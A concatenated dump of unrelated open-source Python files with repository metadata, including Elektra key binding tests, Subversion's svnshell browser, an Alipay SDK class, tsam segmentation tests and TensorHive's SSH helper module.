config = decreasedMonitoringTimeouts
reqCount = 10
sdk_send_random_and_check(looper,
txnPoolNodeSet,
sdk_pool_handle,
sdk_wallet_client,
reqCount)
ensure_all_nodes_have_same_data(looper, nodes=txnPoolNodeSet)
looper.runFor(WIND_SIZE * MIN_CNT)
for node in txnPoolNodeSet:
assert node.monitor.highResThroughput > 0
assert node.monitor.totalRequests == reqCount
# TODO: Add implementation to actually call firebase plugin
# and test if firebase plugin is sending total request count
# if node is primary
looper.runFor(config.DashboardUpdateFreq)
for node in txnPoolNodeSet:
node.monitor.spylog.count(Monitor.sendThroughput.__name__) > 0
def testPostingLatency(postingStatsEnabled,
decreasedMonitoringTimeouts,
looper,
txnPoolNodeSet,
sdk_wallet_client, sdk_pool_handle):
config = decreasedMonitoringTimeouts
reqCount = 10
sdk_send_random_and_check(looper,
txnPoolNodeSet,
sdk_pool_handle,
sdk_wallet_client,
reqCount)
for node in txnPoolNodeSet:
assert node.monitor.masterLatency > 0
assert node.monitor.avgBackupLatency > 0
looper.runFor(config.DashboardUpdateFreq)
for node in txnPoolNodeSet:
node.monitor.spylog.count(Monitor.sendLatencies.__name__) > 0
|
d3de339be067919ea5d2427760b1b7f3a6b0e67b
|
5e4913b3d7b6dfd9f35d9e5f24486bb6b6145125
|
/src/bindings/swig/python/tests_kdb/test_key.py
|
2e9ecd7f22e49d47738d445a6587dcec9616bfdc
|
[
"BSD-3-Clause"
] |
permissive
|
ElektraInitiative/libelektra
|
ff5d5cfc4bf91d704f58405b14ea694aad3a2edd
|
dbbe4ae4f669c322a8f95f59112d3f5fc370bbd9
|
refs/heads/master
| 2023-08-05T14:54:48.081359
| 2023-08-04T12:40:00
| 2023-08-04T12:40:00
| 21,063,580
| 215
| 170
|
BSD-3-Clause
| 2023-09-07T13:34:30
| 2014-06-21T08:01:04
|
C
|
UTF-8
|
Python
| false
| false
| 6,084
|
py
|
test_key.py
|
import kdb, unittest
class Key(unittest.TestCase):
def setUp(self):
self.key = kdb.Key("user:/foo/bar",
kdb.KEY_VALUE, "value",
kdb.KEY_META, "by", "manuel",
kdb.KEY_META, "owner", "myowner"
)
self.bkey = kdb.Key("system:/bkey",
kdb.KEY_VALUE, b"bvalue\0\0",
kdb.KEY_END,
kdb.KEY_META, "lost", "lost"
)
def test_ctor(self):
self.assertIsInstance(self.key, kdb.Key)
self.assertIsInstance(self.bkey, kdb.Key)
k = kdb.Key("/cascading/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("spec:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("proc:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("dir:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("user:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("system:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key()
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
with self.assertRaises(kdb.KeyInvalidName):
k = kdb.Key("wrongname")
k = kdb.Key("user:/foo")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key(self.key)
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key(self.key.dup())
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
self.assertEqual(k, self.key)
k.name = "user:/copied"
self.assertNotEqual(k, self.key)
def test_operator(self):
self.assertNotEqual(self.key, self.bkey)
self.assertEqual(kdb.Key(self.key), self.key)
self.assertEqual(self.key, kdb.Key("user:/foo/bar", kdb.KEY_META, "owner", "myowner"))
self.assertEqual(kdb.Key(), kdb.Key())
self.assertNotEqual(kdb.Key("user:/key1"), kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key1") == kdb.Key("user:/key1"))
self.assertTrue(kdb.Key("user:/key1") != kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key1") < kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key1") <= kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key2") > kdb.Key("user:/key1"))
self.assertTrue(kdb.Key("user:/key2") >= kdb.Key("user:/key1"))
self.assertTrue(bool(self.key))
self.assertTrue(bool(self.bkey))
self.assertEqual(str(self.key), "user:/foo/bar")
self.assertEqual(str(self.bkey), "system:/bkey")
self.assertEqual(len(self.key), 3)
self.assertEqual(len(self.bkey), 2)
self.assertEqual(repr(self.key), "kdb.Key('user:/foo/bar')")
self.assertEqual(repr(self.bkey), "kdb.Key('system:/bkey')")
with self.assertRaises(TypeError):
hash(kdb.Key("user:/not_name_locked"))
def test_properties(self):
self.assertEqual(self.key.name, "user:/foo/bar")
self.assertEqual(self.key.value, "value")
self.assertEqual(self.key.basename, "bar")
self.assertEqual(self.bkey.name, "system:/bkey")
self.assertEqual(self.bkey.value, b"bvalue\0\0")
self.assertEqual(self.bkey.basename, "bkey")
k = kdb.Key("user:/key1", kdb.KEY_VALUE, "value")
self.assertFalse(k.isBinary())
self.assertIsNone(k.getMeta("binary"))
k.name = "system:/key2"
k.basename = "key3"
k.value = b"bvalue\0\0"
self.assertEqual(k.name, "system:/key3")
self.assertEqual(k.value, b"bvalue\0\0")
self.assertTrue(k.isBinary())
self.assertIsInstance(self.bkey.getMeta("binary"), kdb.Key)
self.assertEqual(kdb.Key("user:/key1", "value").value, "value")
self.assertEqual(kdb.Key("user:/key1", b"bvalue\0\0").value, b"bvalue\0\0")
k = kdb.Key("user:/key2")
with self.assertRaises(kdb.KeyInvalidName):
k.name = "foo"
def test_functions(self):
self.assertTrue(self.key.isUser())
self.assertTrue(self.bkey.isSystem())
self.assertTrue(self.key.isString())
self.assertTrue(self.bkey.isBinary())
self.assertTrue(self.key.isBelow(kdb.Key("user:/foo")))
self.assertFalse(self.key.isNameLocked())
self.assertFalse(self.key.isValueLocked())
self.assertFalse(self.key.isMetaLocked())
k = kdb.Key("user:/key1", kdb.KEY_VALUE, "value")
self.assertEqual(k.get(), "value")
k.set(b"bvalue\0\0")
self.assertEqual(k.get(), b"bvalue\0\0")
def test_meta(self):
self.assertIsInstance(self.key.getMeta("owner"), kdb.Key)
self.assertEqual(self.key.getMeta("owner").name, "meta:/owner")
self.assertEqual(self.key.getMeta("owner").value, "myowner")
self.assertEqual(self.key.getMeta("by").value, "manuel")
self.assertTrue(self.key.getMeta("by").isNameLocked())
self.assertTrue(self.key.getMeta("by").isValueLocked())
self.assertTrue(self.key.getMeta("by").isMetaLocked())
self.assertFalse(self.key.hasMeta("doesnt_exist"))
self.assertIsNone(self.key.getMeta("doesnt_exist"))
self.assertTrue(bool(self.bkey.getMeta("binary")))
self.assertIsNone(self.bkey.getMeta("owner"))
k = kdb.Key("user:/key1")
k.setMeta("foo", "bar")
self.assertEqual(k.getMeta("foo").value, "bar")
k = kdb.Key("user:/key1", { "foo2": "bar2", "foo3": "bar3" })
self.assertEqual(k.getMeta("foo2").value, "bar2")
self.assertEqual(k.getMeta("foo3").value, "bar3")
self.assertEqual(sum(1 for _ in self.key.getMeta()), 2)
self.assertEqual(sum(1 for _ in self.bkey.getMeta()), 1)
def test_python_copy(self):
import copy
k = copy.copy(self.key)
self.assertEqual(k, self.key)
k.name = "user:/copied"
self.assertNotEqual(k, self.key)
def test_iterator(self):
k = kdb.Key("user:/a\/b/c")
self.assertEqual(sum(1 for _ in k), 3)
self.assertEqual(sum(1 for _ in reversed(k)), 3)
self.assertEqual(iter(k).value(), "".join([chr(kdb.KEY_NS_USER)]))
self.assertEqual(reversed(k).value(), "c")
def test_helpers(self):
with self.assertRaises(ValueError):
kdb.Key("user:/noarray").array_elements()
parts = kdb.Key("user:/some/array/#_12").array_elements()
self.assertEqual(parts.index, 12)
self.assertEqual(parts.name, "user:/some/array")
self.assertEqual(parts.basename, "array")
if __name__ == '__main__':
unittest.main()
|
54bed0b70e16762f3b2db50210f651e0e46177e5
|
3a2071c34e3c35847b2bcc2a5d3b3a74114daa0f
|
/tools/examples/svnshell.py
|
9c67af4664c470c421e272ef4a9ef850fcd80271
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-other-permissive",
"X11",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"HPND-Markus-Kuhn",
"LicenseRef-scancode-unicode",
"Apache-2.0",
"FSFAP"
] |
permissive
|
apache/subversion
|
18a9142afe63f060ffc0814fe0c758c91ad8bd31
|
dd957c4991e61bde23cc60d13449ea8b65f80c43
|
refs/heads/trunk
| 2023-09-04T15:22:36.755177
| 2023-08-29T19:55:03
| 2023-08-29T19:55:03
| 454,263
| 520
| 207
|
Apache-2.0
| 2023-08-26T14:17:30
| 2009-12-31T09:00:10
|
C
|
UTF-8
|
Python
| false
| false
| 11,429
|
py
|
svnshell.py
|
#!/usr/bin/env python
#
# svnshell.py : a Python-based shell interface for cruising 'round in
# the filesystem.
#
######################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
#
import sys
import time
import re
from cmd import Cmd
from random import randint
from svn import fs, core, repos
class SVNShell(Cmd):
def __init__(self, path):
"""initialize an SVNShell object"""
Cmd.__init__(self)
path = core.svn_path_canonicalize(path)
self.fs_ptr = repos.fs(repos.open(path))
self.is_rev = 1
self.rev = fs.youngest_rev(self.fs_ptr)
self.txn = None
self.root = fs.revision_root(self.fs_ptr, self.rev)
self.path = "/"
self._setup_prompt()
self.cmdloop()
def precmd(self, line):
if line == "EOF":
# Ctrl-D is a command without a newline. Print a newline, so the next
# shell prompt is not on the same line as the last svnshell prompt.
print("")
return "exit"
return line
def postcmd(self, stop, line):
self._setup_prompt()
_errors = ["Huh?",
"Whatchoo talkin' 'bout, Willis?",
"Say what?",
"Nope. Not gonna do it.",
"Ehh...I don't think so, chief."]
def default(self, line):
print(self._errors[randint(0, len(self._errors) - 1)])
def do_cat(self, arg):
"""dump the contents of a file"""
if not len(arg):
print("You must supply a file path.")
return
catpath = self._parse_path(arg)
kind = fs.check_path(self.root, catpath)
if kind == core.svn_node_none:
print("Path '%s' does not exist." % catpath)
return
if kind == core.svn_node_dir:
print("Path '%s' is not a file." % catpath)
return
### be nice to get some paging in here.
stream = fs.file_contents(self.root, catpath)
while True:
data = core.svn_stream_read(stream, core.SVN_STREAM_CHUNK_SIZE)
sys.stdout.write(data)
if len(data) < core.SVN_STREAM_CHUNK_SIZE:
break
def do_cd(self, arg):
"""change directory"""
newpath = self._parse_path(arg)
# make sure that path actually exists in the filesystem as a directory
kind = fs.check_path(self.root, newpath)
if kind != core.svn_node_dir:
print("Path '%s' is not a valid filesystem directory." % newpath)
return
self.path = newpath
def do_ls(self, arg):
"""list the contents of the current directory or provided path"""
parent = self.path
if not len(arg):
# no arg -- show a listing for the current directory.
entries = fs.dir_entries(self.root, self.path)
else:
# arg? show a listing of that path.
newpath = self._parse_path(arg)
kind = fs.check_path(self.root, newpath)
if kind == core.svn_node_dir:
parent = newpath
entries = fs.dir_entries(self.root, parent)
elif kind == core.svn_node_file:
parts = self._path_to_parts(newpath)
name = parts.pop(-1)
parent = self._parts_to_path(parts)
print(parent + ':' + name)
tmpentries = fs.dir_entries(self.root, parent)
if not tmpentries.get(name, None):
return
entries = {}
entries[name] = tmpentries[name]
else:
print("Path '%s' not found." % newpath)
return
keys = sorted(entries.keys())
print(" REV AUTHOR NODE-REV-ID SIZE DATE NAME")
print("----------------------------------------------------------------------------")
for entry in keys:
fullpath = parent + '/' + entry
size = ''
is_dir = fs.is_dir(self.root, fullpath)
if is_dir:
name = entry + '/'
else:
size = str(fs.file_length(self.root, fullpath))
name = entry
node_id = fs.unparse_id(entries[entry].id)
created_rev = fs.node_created_rev(self.root, fullpath)
author = fs.revision_prop(self.fs_ptr, created_rev,
core.SVN_PROP_REVISION_AUTHOR)
if not author:
author = ""
date = fs.revision_prop(self.fs_ptr, created_rev,
core.SVN_PROP_REVISION_DATE)
if not date:
date = ""
else:
date = self._format_date(date)
print("%6s %8s %12s %8s %12s %s" % (created_rev, author[:8],
node_id, size, date, name))
def do_lstxns(self, arg):
"""list the transactions available for browsing"""
txns = sorted(fs.list_transactions(self.fs_ptr))
counter = 0
for txn in txns:
counter = counter + 1
sys.stdout.write("%8s " % txn)
if counter == 6:
print("")
counter = 0
print("")
def do_pcat(self, arg):
"""list the properties of a path"""
catpath = self.path
if len(arg):
catpath = self._parse_path(arg)
kind = fs.check_path(self.root, catpath)
if kind == core.svn_node_none:
print("Path '%s' does not exist." % catpath)
return
plist = fs.node_proplist(self.root, catpath)
if not plist:
return
for pkey, pval in plist.items():
print('K ' + str(len(pkey)))
print(pkey)
print('P ' + str(len(pval)))
print(pval)
print('PROPS-END')
def do_setrev(self, arg):
"""set the current revision to view"""
try:
if arg.lower() == 'head':
rev = fs.youngest_rev(self.fs_ptr)
else:
rev = int(arg)
newroot = fs.revision_root(self.fs_ptr, rev)
except:
print("Error setting the revision to '" + arg + "'.")
return
fs.close_root(self.root)
self.root = newroot
self.rev = rev
self.is_rev = 1
self._do_path_landing()
def do_settxn(self, arg):
"""set the current transaction to view"""
try:
txnobj = fs.open_txn(self.fs_ptr, arg)
newroot = fs.txn_root(txnobj)
except:
print("Error setting the transaction to '" + arg + "'.")
return
fs.close_root(self.root)
self.root = newroot
self.txn = arg
self.is_rev = 0
self._do_path_landing()
def do_youngest(self, arg):
"""list the youngest revision available for browsing"""
rev = fs.youngest_rev(self.fs_ptr)
print(rev)
def do_exit(self, arg):
sys.exit(0)
def _path_to_parts(self, path):
return [_f for _f in path.split('/') if _f]
def _parts_to_path(self, parts):
return '/' + '/'.join(parts)
def _parse_path(self, path):
# cleanup leading, trailing, and duplicate '/' characters
newpath = self._parts_to_path(self._path_to_parts(path))
# if PATH is absolute, use it, else append it to the existing path.
if path.startswith('/') or self.path == '/':
newpath = '/' + newpath
else:
newpath = self.path + '/' + newpath
# cleanup '.' and '..'
parts = self._path_to_parts(newpath)
finalparts = []
for part in parts:
if part == '.':
pass
elif part == '..':
if len(finalparts) != 0:
finalparts.pop(-1)
else:
finalparts.append(part)
# finally, return the calculated path
return self._parts_to_path(finalparts)
def _format_date(self, date):
date = core.svn_time_from_cstring(date)
date = time.asctime(time.localtime(date / 1000000))
return date[4:-8]
def _do_path_landing(self):
"""try to land on self.path as a directory in root, failing up to '/'"""
not_found = 1
newpath = self.path
while not_found:
kind = fs.check_path(self.root, newpath)
if kind == core.svn_node_dir:
not_found = 0
else:
parts = self._path_to_parts(newpath)
parts.pop(-1)
newpath = self._parts_to_path(parts)
self.path = newpath
def _setup_prompt(self):
"""present the prompt and handle the user's input"""
if self.is_rev:
self.prompt = "<rev: " + str(self.rev)
else:
self.prompt = "<txn: " + self.txn
self.prompt += " " + self.path + ">$ "
def _complete(self, text, line, begidx, endidx, limit_node_kind=None):
"""Generic tab completer. Takes the 4 standard parameters passed to a
cmd.Cmd completer function, plus LIMIT_NODE_KIND, which should be a
svn.core.svn_node_foo constant to restrict the returned completions to, or
None for no limit. Catches and displays exceptions, because otherwise
they are silently ignored - which is quite frustrating when debugging!"""
try:
args = line.split()
if len(args) > 1:
arg = args[1]
else:
arg = ""
dirs = arg.split('/')
user_elem = dirs[-1]
user_dir = "/".join(dirs[:-1] + [''])
canon_dir = self._parse_path(user_dir)
entries = fs.dir_entries(self.root, canon_dir)
acceptable_completions = []
for name, dirent_t in entries.items():
if not name.startswith(user_elem):
continue
if limit_node_kind and dirent_t.kind != limit_node_kind:
continue
if dirent_t.kind == core.svn_node_dir:
name += '/'
acceptable_completions.append(name)
if limit_node_kind == core.svn_node_dir or not limit_node_kind:
if user_elem in ('.', '..'):
for extraname in ('.', '..'):
if extraname.startswith(user_elem):
acceptable_completions.append(extraname + '/')
return acceptable_completions
except:
ei = sys.exc_info()
sys.stderr.write("EXCEPTION WHILST COMPLETING\n")
import traceback
traceback.print_tb(ei[2])
sys.stderr.write("%s: %s\n" % (ei[0], ei[1]))
raise
def complete_cd(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx, core.svn_node_dir)
def complete_cat(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx, core.svn_node_file)
def complete_ls(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx)
def complete_pcat(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx)
def _basename(path):
"Return the basename for a '/'-separated path."
idx = path.rfind('/')
if idx == -1:
return path
return path[idx+1:]
def usage(exit):
if exit:
output = sys.stderr
else:
output = sys.stdout
output.write(
"usage: %s REPOS_PATH\n"
"\n"
"Once the program has started, type 'help' at the prompt for hints on\n"
"using the shell.\n" % sys.argv[0])
sys.exit(exit)
def main():
if len(sys.argv) != 2:
usage(1)
SVNShell(sys.argv[1])
if __name__ == '__main__':
main()
|
25ccf416a38eaee3380d9844d935077b1fd3c23a
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/ErrorDishStallEntity.py
|
fd6fa5786cbc18dd6e567ce775972cd5fbc8fafb
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,806
|
py
|
ErrorDishStallEntity.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ErrorDishEntity import ErrorDishEntity
from alipay.aop.api.domain.ErrorDishEntity import ErrorDishEntity
class ErrorDishStallEntity(object):
def __init__(self):
self._no_set_stall = None
self._repeat_set_stall = None
@property
def no_set_stall(self):
return self._no_set_stall
@no_set_stall.setter
def no_set_stall(self, value):
if isinstance(value, list):
self._no_set_stall = list()
for i in value:
if isinstance(i, ErrorDishEntity):
self._no_set_stall.append(i)
else:
self._no_set_stall.append(ErrorDishEntity.from_alipay_dict(i))
@property
def repeat_set_stall(self):
return self._repeat_set_stall
@repeat_set_stall.setter
def repeat_set_stall(self, value):
if isinstance(value, list):
self._repeat_set_stall = list()
for i in value:
if isinstance(i, ErrorDishEntity):
self._repeat_set_stall.append(i)
else:
self._repeat_set_stall.append(ErrorDishEntity.from_alipay_dict(i))
def to_alipay_dict(self):
params = dict()
if self.no_set_stall:
if isinstance(self.no_set_stall, list):
for i in range(0, len(self.no_set_stall)):
element = self.no_set_stall[i]
if hasattr(element, 'to_alipay_dict'):
self.no_set_stall[i] = element.to_alipay_dict()
if hasattr(self.no_set_stall, 'to_alipay_dict'):
params['no_set_stall'] = self.no_set_stall.to_alipay_dict()
else:
params['no_set_stall'] = self.no_set_stall
if self.repeat_set_stall:
if isinstance(self.repeat_set_stall, list):
for i in range(0, len(self.repeat_set_stall)):
element = self.repeat_set_stall[i]
if hasattr(element, 'to_alipay_dict'):
self.repeat_set_stall[i] = element.to_alipay_dict()
if hasattr(self.repeat_set_stall, 'to_alipay_dict'):
params['repeat_set_stall'] = self.repeat_set_stall.to_alipay_dict()
else:
params['repeat_set_stall'] = self.repeat_set_stall
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ErrorDishStallEntity()
if 'no_set_stall' in d:
o.no_set_stall = d['no_set_stall']
if 'repeat_set_stall' in d:
o.repeat_set_stall = d['repeat_set_stall']
return o
|
950cc1b0c4b20e063467368c5df51579b2a38fa9
|
b12e054e945ffe0689422a74684dc7dc8c70669f
|
/test/test_segmentation.py
|
e7c25212027567be156aabb6328e5a4ac8e6ab52
|
[
"MIT"
] |
permissive
|
FZJ-IEK3-VSA/tsam
|
9da0aaaf6468497b88c9e29ba555368db88843b6
|
a86c4cd946d1b77faa2ca1d78018f092fe57b8d4
|
refs/heads/master
| 2023-09-01T06:19:47.392079
| 2023-08-25T07:10:36
| 2023-08-25T07:10:36
| 91,314,171
| 151
| 37
|
MIT
| 2023-08-25T07:06:51
| 2017-05-15T08:36:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,700
|
py
|
test_segmentation.py
|
import os
import time
import pandas as pd
import numpy as np
import tsam.timeseriesaggregation as tsam
def test_segmentation():
raw = pd.read_csv(
os.path.join(os.path.dirname(__file__), "..", "examples", "testdata.csv"),
index_col=0,
)
orig_raw = pd.read_csv(
os.path.join(
os.path.dirname(__file__),
"..",
"examples",
"results",
"testperiods_segmentation.csv",
),
index_col=[0, 1, 2],
)
starttime = time.time()
aggregation = tsam.TimeSeriesAggregation(
raw,
noTypicalPeriods=20,
hoursPerPeriod=24,
clusterMethod="hierarchical",
representationMethod="meanRepresentation",
segmentation=True,
noSegments=12,
)
typPeriods = aggregation.createTypicalPeriods()
print("Clustering took " + str(time.time() - starttime))
# sort the typical days in order to avoid error assertion due to different order
sortedDaysOrig = orig_raw.groupby(level=0).sum().sort_values("GHI").index
sortedDaysTest = typPeriods.groupby(level=0).sum().sort_values("GHI").index
# rearange their order
orig = orig_raw[typPeriods.columns].unstack().loc[sortedDaysOrig, :].stack()
test = typPeriods.unstack().loc[sortedDaysTest, :].stack()
np.testing.assert_array_almost_equal(orig.values, test.values, decimal=4)
def test_representation_in_segmentation():
segmentationCandidates = np.array([[0. , 0.38936961, 0.27539063, 0.25 ],
[0. , 0.35591778, 0.26841518, 0.25 ],
[0. , 0.35045773, 0.265625 , 0.25 ],
[0. , 0.36418749, 0.25372024, 0.25 ],
[0. , 0.38386857, 0.25167411, 0.25 ],
[0. , 0.42710529, 0.24237351, 0.16666667],
[0. , 0.5798638 , 0.23707217, 0.1922619 ],
[0. , 0.70166596, 0.24507068, 0.16666667],
[0.01838546, 0.74661296, 0.24739583, 0.18363095],
[0.06893491, 0.75398663, 0.26041667, 0.16666667],
[0.0942519 , 0.77160913, 0.28385417, 0.16666667],
[0.14374472, 0.80191153, 0.3046875 , 0.25 ],
[0.11999155, 0.79502066, 0.3125 , 0.22678571],
[0.10016906, 0.77613611, 0.31845238, 0.16666667],
[0.07438715, 0.76489634, 0.3203125 , 0.16666667],
[0.0101437 , 0.75082659, 0.31538318, 0.16666667],
[0. , 0.74856422, 0.3077567 , 0.16666667],
[0. , 0.76062049, 0.29678199, 0.08333333],
[0. , 0.78148316, 0.29427083, 0.16666667],
[0. , 0.75668439, 0.28738839, 0.16666667],
[0. , 0.67461737, 0.2859933 , 0.16666667],
[0. , 0.624061 , 0.28041295, 0.16666667],
[0. , 0.56076035, 0.2734375 , 0.16666667],
[0. , 0.4734255 , 0.27092634, 0.16666667]])
clusterOrder = np.array([5, 5, 5, 5, 5, 7, 3, 2, 2, 2, 2, 0, 0, 0, 0, 1, 1, 1, 1, 1, 6, 6,
4, 4])
clusterCenters_mean, clusterCenterIndices = tsam.representations(
segmentationCandidates,
clusterOrder,
default="meanRepresentation",
representationMethod="meanRepresentation",
distributionPeriodWise=False,
timeStepsPerPeriod=1,
)
clusterCenters_dist, clusterCenterIndices = tsam.representations(
segmentationCandidates,
clusterOrder,
default="meanRepresentation",
representationMethod="distributionRepresentation",
distributionPeriodWise=True,
timeStepsPerPeriod=1,
)
assert np.isclose(clusterCenters_mean, clusterCenters_dist).all()
if __name__ == "__main__":
test_segmentation()
|
332db7a76842ae712c7cf5889510a125d5875b10
|
ef1def58b933921ccf31bece9fc6eb5f7ffb9a18
|
/tensorhive/core/ssh.py
|
bd2f9fd6b2d511d77520f72de3fbc4a5be819de6
|
[
"Apache-2.0"
] |
permissive
|
roscisz/TensorHive
|
4b33acd727e0b294a4a12af972c471e1254136aa
|
5b50245d285618044a9a71c06ea5361a48ad4acb
|
refs/heads/master
| 2023-03-10T05:09:08.874394
| 2022-02-02T11:08:21
| 2022-02-02T11:08:21
| 98,513,283
| 153
| 26
|
Apache-2.0
| 2023-03-01T02:26:54
| 2017-07-27T08:37:35
|
Python
|
UTF-8
|
Python
| false
| false
| 6,092
|
py
|
ssh.py
|
from tensorhive.core.utils.decorators import memoize, timeit
from tensorhive.config import SSH
from pssh.clients.native import ParallelSSHClient
from pssh.exceptions import AuthenticationException
from typing import Optional, Dict, Tuple, Generator, List
from paramiko.rsakey import RSAKey
from pathlib import PosixPath
import pssh
import logging
log = logging.getLogger(__name__)
__author__ = '@micmarty, @roscisz'
"""
This module provides a universal and stateless API for SSH-related tasks.
Author's note:
It has similar functionality to `SSHConnectionManager` on purpose -
the goal is to gradually replace chunks of code where it's currently used
without breaking compatibility everywhere.
(SSHConnectionManager has unnecessary boilerplate and stateful behaviour).
"""
# Typing aliases
HostConfig = Dict[str, str]
HostsConfig = Dict[str, HostConfig]
ProxyConfig = Dict[str, str]
Hostname = str
Username = str
CommandResult = Dict[Hostname, pssh.output.HostOutput]
def build_dedicated_config_for(host: Hostname, user: Username) -> Tuple[HostsConfig, Optional[ProxyConfig]]:
"""Takes off the responsibility for building correct HostsConfig manually.
This function is supposed to provide high-level interface for providing
valid `config` and `pconfig` parameter to `get_client()` function.
"""
assert host and user, 'Arguments must not be None!'
assert host in SSH.AVAILABLE_NODES
hosts_config = {
host: {
'user': user,
'pkey': SSH.KEY_FILE,
'port': SSH.AVAILABLE_NODES[host]['port']
}
}
# Read config extracted from hosts_config.ini (proxy is common for all hosts)
pconfig = SSH.PROXY
return hosts_config, pconfig
@memoize
def get_client(config: HostsConfig, pconfig: Optional[ProxyConfig] = None, **kwargs) -> ParallelSSHClient:
"""Builds and returns an ssh client object for given configuration.
Client is fetched directly from cache if identical arguments were used recently.
"""
if pconfig is None:
pconfig = {}
return ParallelSSHClient(
hosts=config.keys(),
host_config=config,
pkey=SSH.KEY_FILE,
proxy_host=pconfig.get('proxy_host'),
proxy_user=pconfig.get('proxy_user'),
proxy_port=pconfig.get('proxy_port'),
num_retries=0,
**kwargs)
def run_command(client: ParallelSSHClient, command: str) -> CommandResult:
"""Executes identical command on all hosts attached to client.
Will wait until all hosts complete the command execution or timeout is reached.
Re-raises pssh exceptions.
# TODO Handle more specific exceptions
"""
# stop_on_errors -> allows others hosts to execute when one crashes, combine exceptions
# output is like: (hostname, host_output)
try:
result = client.run_command(command, stop_on_errors=False)
client.join(result)
except pssh.exceptions.Timeout:
log.warning('Command `{}` reached time limit'.format(command))
raise
except pssh.exceptions.ProxyError as e:
log.error('Could not connect to proxy server, reason: {}'.format(e))
raise
except Exception as e:
log.critical(e)
raise # FIXME Find out what throws this exception
else:
log.debug('Command `{}` finished'.format(command))
return result
def get_stdout(host: Hostname, output: pssh.output.HostOutput) -> Optional[str]:
"""Unwraps stdout generator for given hostname.
Re-raises exceptions that occured during command execution.
Returns a single, usually multi-line string or None
# TODO Handle more exceptions
"""
try:
host_result = output[host]
if host_result.exception:
raise host_result.exception
return '\n'.join(list(host_result.stdout))
except KeyError:
log.error('Could not unwrap HostOutput object for {}'.format(host))
raise
except (TypeError, ):
log.warning('Could not extract stdout for {}: {}'.format(host, output))
return None
except AuthenticationException:
log.warning('Could not authenticate SSH connection for {}: {}'.format(host, output))
return None
except Exception as e:
log.critical(e)
# Base for all pssh exceptions: https://github.com/ParallelSSH/parallel-ssh/blob/master/pssh/exceptions.py
# client.reset_output_generators(output)
raise
def succeeded(host: Hostname, output: pssh.output.HostOutput) -> bool:
"""Checks whether command's output was executed without any exception and exit code was 0."""
return (output.exception is None) and (output.exit_code == 0)
def generate_cert(path, replace=False):
path.touch(mode=0o600, exist_ok=replace)
key = RSAKey.generate(2048)
key.write_private_key_file(str(path))
return key
def init_ssh_key(path: PosixPath):
if path.exists():
key = RSAKey.from_private_key_file(str(path))
log.info('[⚙] Using existing SSH key in {}'.format(path))
else:
key = generate_cert(path)
log.info('[⚙] Generated SSH key in {}'.format(path))
return key
def node_tty_sessions(connection) -> List[Dict]:
'''Executes shell command in order to fetch all active terminal sessions'''
command = 'who'
output = connection.run_command(command)
# FIXME Assumes that only one node is in connection
for _, host_out in output.items():
result = _parse_who_output(host_out.stdout)
return result
def _parse_who_output(stdout: Generator) -> List[Dict]:
'''
Transforms command output into a dictionary
Assumes command was: 'who | grep <username>'
'''
stdout_lines = list(stdout) # type: List[str]
# Empty stdout
if stdout_lines is None:
return None
def as_dict(line):
columns = line.split()
return {
# I wanted it to be more explicit and flexible (even if it could be done better)
'USER': columns[0],
'TTY': columns[1]
}
return [as_dict(line) for line in stdout_lines]
|
35bfd207843b0be8a6e55291a3ded30007000e43
|
4b15f318ba3332ee946cb0b2838c93e7935b9b89
|
/tests/functional/tests/engine/test_io_flags.py
|
5fe1b3040cbca350f81dac8bb77d203744350b09
|
[
"BSD-3-Clause"
] |
permissive
|
Open-CAS/ocf
|
c4f8a5c9c1b254a905fda75be2c19bd7c8ebd450
|
016d7a8ee2822d672c308264e79bae4081e7930e
|
refs/heads/master
| 2023-05-28T08:40:51.328181
| 2023-05-11T08:11:57
| 2023-05-11T08:11:57
| 152,160,836
| 168
| 94
|
BSD-3-Clause
| 2023-09-14T08:01:50
| 2018-10-08T23:46:10
|
C
|
UTF-8
|
